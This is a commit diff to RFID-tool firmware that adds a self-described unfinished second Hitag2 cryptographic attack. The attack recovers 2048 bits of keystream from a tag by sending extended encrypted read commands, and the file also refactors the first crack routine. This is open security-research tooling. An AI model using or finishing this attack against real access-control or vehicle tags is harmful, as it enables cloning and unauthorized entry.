added "lf hitag crack2" to support the second attack vector against Hitag2, based on all work from @kevsecurity Kev Sheldrake in the RFIDler repo. This is WIP, not working at the moment

armsrc/hitag2_crack.c

@@ -28,6 +28,7 @@
 #include "string.h"
 #include "BigBuf.h"
 #include "cmd.h"
+#include "lfadc.h"
 
 const static uint8_t ERROR_RESPONSE[] = { 0xF4, 0x02, 0x88, 0x9C };
 
@@ -48,20 +49,18 @@ static void hitag2crack_xor(uint8_t *target, const uint8_t *source, const uint8_
 // nrar is the 64 bit binarray of the nR aR pair;
 // cmd is the binarray of the encrypted command to send;
 // len is the length of the encrypted command.
-static bool hitag2crack_send_e_cmd(uint8_t *resp, uint8_t *nrar, uint8_t *cmd, int len) {
+static bool hitag2crack_send_e_cmd(uint8_t *resp, uint8_t *nrar, uint8_t *cmd, size_t len) {
 
     memset(resp, 0, 4);
 
     // Get UID
-    uint8_t uid[4];
-    if (ht2_read_uid(uid, false, false, true) != PM3_SUCCESS) {
+    if (ht2_read_uid(NULL, true, false, true) != PM3_SUCCESS) {
         return false;
     }
 
     // send nrar and receive (useless) encrypted page 3 value
-    uint8_t e_page3[4];
     size_t n = 0;
-    if (ht2_tx_rx(nrar, 64, e_page3, &n, true, true) != PM3_SUCCESS) {
+    if (ht2_tx_rx(nrar, 64, NULL, &n, true, true) != PM3_SUCCESS) {
         return false;
     }
 
@@ -146,12 +145,12 @@ static bool hitag2crack_read_page(uint8_t *resp, uint8_t pagenum, uint8_t *nrar,
 // e_uid is the binarray of the encrypted version of the UID.
 static bool hitag2crack_test_e_p0cmd(uint8_t *keybits, uint8_t *nrar, uint8_t *e_cmd, uint8_t *uid, uint8_t *e_uid) {
 
-    uint8_t cipherbits[42];
+    uint8_t cipherbits[42] = {0};
     memcpy(cipherbits, e_cmd, 10);          // copy encrypted cmd to cipherbits
     memcpy(cipherbits + 10, e_uid, 32);     // copy encrypted uid to cipherbits
 
 
-    uint8_t plainbits[42];
+    uint8_t plainbits[42] = {0};
     memcpy(plainbits, read_p0_cmd, sizeof(read_p0_cmd));    // copy cmd to plainbits
     memcpy(plainbits + 10, uid, 32);                        // copy uid to plainbits
 
@@ -159,23 +158,23 @@ static bool hitag2crack_test_e_p0cmd(uint8_t *keybits, uint8_t *nrar, uint8_t *e
     hitag2crack_xor(keybits, plainbits, cipherbits, 42);
 
     // create extended cmd -> 4 * READP0CMD = 40 bits
-    uint8_t ext_cmd[40];
-    memcpy(ext_cmd, read_p0_cmd, sizeof(read_p0_cmd));
-    memcpy(ext_cmd + 10, read_p0_cmd, sizeof(read_p0_cmd));
-    memcpy(ext_cmd + 20, read_p0_cmd, sizeof(read_p0_cmd));
-    memcpy(ext_cmd + 30, read_p0_cmd, sizeof(read_p0_cmd));
-
     // xor extended cmd with keybits
-    uint8_t e_ext_cmd[40];
-    hitag2crack_xor(e_ext_cmd, ext_cmd, keybits, 40);
+    uint8_t e_ext_cmd[40] = {0};
+    hitag2crack_xor(e_ext_cmd, read_p0_cmd, keybits, 10);
+    hitag2crack_xor(e_ext_cmd + 10, read_p0_cmd, keybits + 10, 10);
+    hitag2crack_xor(e_ext_cmd + 20, read_p0_cmd, keybits + 20, 10);
+    hitag2crack_xor(e_ext_cmd + 30, read_p0_cmd, keybits + 30, 10);
 
     // send extended encrypted cmd
-    uint8_t resp[4];
+    uint8_t resp[4] = {0};
     if (hitag2crack_send_e_cmd(resp, nrar, e_ext_cmd, 40)) {
-
+       
         // test if it was valid
         if (memcmp(resp, ERROR_RESPONSE, 4)) {
             return true;
+        } else {
+            DbpString("test enc-page0 cmd.  got error-response");
+            Dbhexdump(4, resp, false);
         }
     }
     return false;
@@ -230,6 +229,7 @@ static bool hitag2crack_find_e_page0_cmd(uint8_t *keybits, uint8_t *e_firstcmd,
                         if (memcmp(resp, ERROR_RESPONSE, 4)) {
 
                             // convert response to binarray
+                            // response should been encrypted UID
                             uint8_t e_uid[32];
                             hex2binarray((char *)e_uid, (char *)resp);
 
@@ -296,11 +296,115 @@ static bool hitag2crack_find_valid_e_cmd(uint8_t *e_cmd, uint8_t *nrar) {
     return false;
 }
 
+
+
+typedef struct {
+    uint8_t keybits[2080];
+    uint8_t uid[32];
+    uint8_t nrar[64];
+    uint8_t e_ext_cmd[2080];
+    uint8_t ext_cmd[2080];
+} PACKED lf_hitag_crack2_t;
+
+// hitag2crack_consume_keystream sends an extended command (up to 510 bits in
+// length) to consume keystream.
+// keybits is the binarray of keystream bits;
+// kslen is the length of keystream;
+// ksoffset is a pointer to the current keystream offset (updated by this fn);
+// nrar is the 64 bit binarray of the nR aR pair.
+//static bool ht2crack_consume_keystream(uint8_t *keybits, int kslen, int *ksoffset) {
+static bool ht2crack_consume_keystream(lf_hitag_crack2_t *c2, int kslen, int *ksoffset) {
+
+    // calculate the length of keybits to consume with the extended command.
+    // 42 = 32 bit response + 10 bit command reserved for next command.  conlen
+    // cannot be longer than 510 bits to fit into the small RWD buffer.
+    int conlen = kslen - *ksoffset - 42;
+    if (conlen < 10)  {
+        DbpString("ht2crack_consume_keystream:  conlen < 10");
+        return false;
+    }
+    
+    // calculate how many repeated commands to send in this extended command.
+    int numcmds = conlen / 10;
+    
+    // xor extended cmd with keybits
+    hitag2crack_xor(c2->e_ext_cmd, c2->ext_cmd, c2->keybits + *ksoffset,  (numcmds * 10));
+
+    // send encrypted command
+    size_t n = 0;
+    uint8_t resp[4];
+    if (ht2_tx_rx(c2->e_ext_cmd, numcmds * 10, resp, &n, true, true) != PM3_SUCCESS) {
+        Dbprintf("ht2crack_consume_keystream:  tx/rx cmd failed,  got %zu", n);
+        return false;
+    }
+    
+    // test response
+    if (memcmp(resp, ERROR_RESPONSE, 4) == 0) {
+        DbpString("ht2crack_consume_keystream:   got error response from card");
+        return false;
+    }
+
+    // dont bother decrypting the response - we already know the keybits
+    
+    // update ksoffset with command length and response
+    *ksoffset += (numcmds * 10) + 32;
+
+    return true;
+}
+
+// hitag2crack_extend_keystream sends an extended command to retrieve more keybits.
+// keybits is the binarray of the keystream bits;
+// kslen is a pointer to the current keybits length;
+// ksoffset is the offset into the keybits array;
+// nrar is the 64 bit binarray of the nR aR pair;
+// uid is the 32 bit binarray of the UID.
+//static bool ht2crack_extend_keystream(uint8_t *keybits, int *kslen, int ksoffset, uint8_t *nrar, uint8_t *uid) {
+static bool ht2crack_extend_keystream(lf_hitag_crack2_t *c2, int *kslen, int ksoffset) {
+    
+       // calc number of command iterations to send
+    int cmdlen = *kslen - ksoffset;
+    if (cmdlen < 10) {
+        DbpString("extend_keystream:   cmdlen < 10");
+        return false;
+    }
+    
+    int numcmds = cmdlen / 10;
+
+    // xor extended cmd with keybits
+    hitag2crack_xor(c2->e_ext_cmd, c2->ext_cmd, c2->keybits + ksoffset, numcmds * 10);
+
+    // send extended encrypted cmd
+    size_t n = 0;
+    uint8_t resp[4];
+    if (ht2_tx_rx(c2->e_ext_cmd, numcmds * 10, resp, &n, true, true) != PM3_SUCCESS) {
+        DbpString("extend_keystream:   tx/rx cmd failed");
+        Dbhexdump(numcmds * 10, c2->e_ext_cmd, false);
+        return false;
+    }
+
+    // test response
+    if (memcmp(resp, ERROR_RESPONSE, 4) == 0) {
+        return false;
+    }    
+
+    // convert response to binarray
+    uint8_t e_response[32];
+    hex2binarray((char*)e_response, (char*)resp);
+
+    // recover keystream from encrypted response
+    hitag2crack_xor(c2->keybits + ksoffset + (numcmds * 10), e_response, c2->uid, 32);
+
+    // update kslen
+    *kslen = ksoffset + (numcmds * 10) + 32;
+    
+    return true;
+}
+
 // hitag2_crack implements the first crack algorithm described in the paper,
 // Gone In 360 Seconds by Verdult, Garcia and Balasch.
 // response is a multi-line text response containing the 8 pages of the cracked tag
 // nrarhex is a string containing hex representations of the 32 bit nR and aR values
-void ht2_crack(uint8_t *nrar_hex) {
+void ht2_crack1(uint8_t *nrar_hex) {
 
     clear_trace();
 
@@ -340,7 +444,6 @@ void ht2_crack(uint8_t *nrar_hex) {
         res = PM3_EFAILED;
         goto out;
     }
-
     // read all pages using key stream
     for (uint8_t i = 1; i < 8; i++) {
         hitag2crack_read_page(packet.data + (i * 4), i, nrar, keybits);
@@ -354,3 +457,121 @@ void ht2_crack(uint8_t *nrar_hex) {
 out:
     reply_ng(CMD_LF_HITAG2_CRACK, res, (uint8_t *)&packet, sizeof(lf_hitag_crack_response_t));
 }
+
+// hitag2_keystream uses the first crack algorithm described in the paper,
+// Gone In 360 Seconds by Verdult, Garcia and Balasch, to retrieve 2048 bits of keystream.
+// response is a multi-line text response containing the hex of the keystream;
+// nrar_hex is the 32 bit nR and aR in hex
+void ht2_crack2(uint8_t *nrar_hex) {
+
+
+    lf_hitag_crack2_t *c2 = (lf_hitag_crack2_t*)BigBuf_calloc(sizeof(lf_hitag_crack2_t));
+    lf_hitag_crack_response_t *packet = (lf_hitag_crack_response_t*)BigBuf_calloc(sizeof(lf_hitag_crack_response_t));
+
+    g_logging = false;
+    LEDsoff();
+    set_tracing(false);
+    clear_trace();
+
+    int res = PM3_SUCCESS;
+
+    // find the 'read page 0' command and recover key stream
+
+    // get uid as hexstring
+    uint8_t uid_hex[4];
+    if (ht2_read_uid(uid_hex, false, false, false) != PM3_SUCCESS) {
+        res = PM3_EFAILED;
+        goto out;
+    }
+
+    hex2binarray_n((char *)c2->uid, (char *)uid_hex, 4);
+    hex2binarray_n((char *)c2->nrar, (char *)nrar_hex, 8);
+
+    // find a valid encrypted command
+    uint8_t e_firstcmd[10];
+    if (hitag2crack_find_valid_e_cmd(e_firstcmd, c2->nrar) == false) {
+        res = PM3_EFAILED;
+        goto out;
+    }
+
+    if (hitag2crack_find_e_page0_cmd(c2->keybits, e_firstcmd, c2->nrar, c2->uid) == false) {
+        res = PM3_EFAILED;
+        goto out;
+    }
+
+    // Now we got 40 bits of keystream in c2->keybits.
+
+    // using the 40 bits of keystream in keybits, sending commands with ever
+    // increasing lengths to acquire 2048 bits of key stream.
+    int kslen = 40;
+
+    // build extended command
+    for (int i = 0; i < 208 ; i++) {
+        memcpy(c2->ext_cmd + (i * 10), read_p0_cmd, 10);
+    }
+
+    while (kslen < 2048) {
+
+        int ksoffset = 0;
+
+        // Get UID
+        if (ht2_read_uid(NULL, true, false, true) != PM3_SUCCESS) {
+            res = PM3_EFAILED;
+            goto out;
+        }
+
+        // send nrar and receive (useless) encrypted page 3 value
+        size_t n = 0;
+        if (ht2_tx_rx(c2->nrar, 64, NULL, &n, true, true) != PM3_SUCCESS) {
+            res = PM3_EFAILED;
+            goto out;
+        }
+
+        // while we have at least 52 bits of keystream, consume it with
+        // extended read page 0 commands. 
+        // 52 = 10 (min command len) + 32 (response) + 10 (min command len we'll send)
+        while ((kslen - ksoffset) >= 52) {
+            // consume the keystream, updating ksoffset as we go
+            //if (ht2crack_consume_keystream(c2->keybits, kslen, &ksoffset, c2->nrar) == false) {
+            if (ht2crack_consume_keystream(c2, kslen, &ksoffset) == false) {
+                DbpString("ht2crack_consume_keystream failed");
+                res = PM3_EFAILED;
+                goto out;
+            }
+        }
+
+        // send an extended command to retrieve more keystream, 
+        // updating kslen as we go
+        if (ht2crack_extend_keystream(c2, &kslen, ksoffset) == false)  {
+            DbpString("ht2crack_extend_keystream failed");
+            res = PM3_EFAILED;
+            goto out;
+        }
+
+        Dbprintf("Recovered " _YELLOW_("%i") " bits of keystream", kslen);
+    }
+    
+    uint8_t *keybitshex = BigBuf_calloc(64);
+    for (int i = 0; i < 2048; i += 256) {
+        binarray2hex(c2->keybits + i, 256, keybitshex);
+        Dbhexdump(256, keybitshex, false);
+    }
+    BigBuf_free();
+
+    // copy UID since we already have it...
+    memcpy(packet->data, uid_hex, 4);
+    packet->status = 1;
+
+out:
+
+/*
+    DbpString("keybits:");
+    Dbhexdump(2080, c2->keybits, false);
+    DbpString("uid:");
+    Dbhexdump(32, c2->uid, false);
+    DbpString("nrar:");
+    Dbhexdump(64, c2->nrar, false);
+*/
+
+    reply_ng(CMD_LF_HITAG2_CRACK_2, res, (uint8_t *)packet, sizeof(lf_hitag_crack_response_t));
+}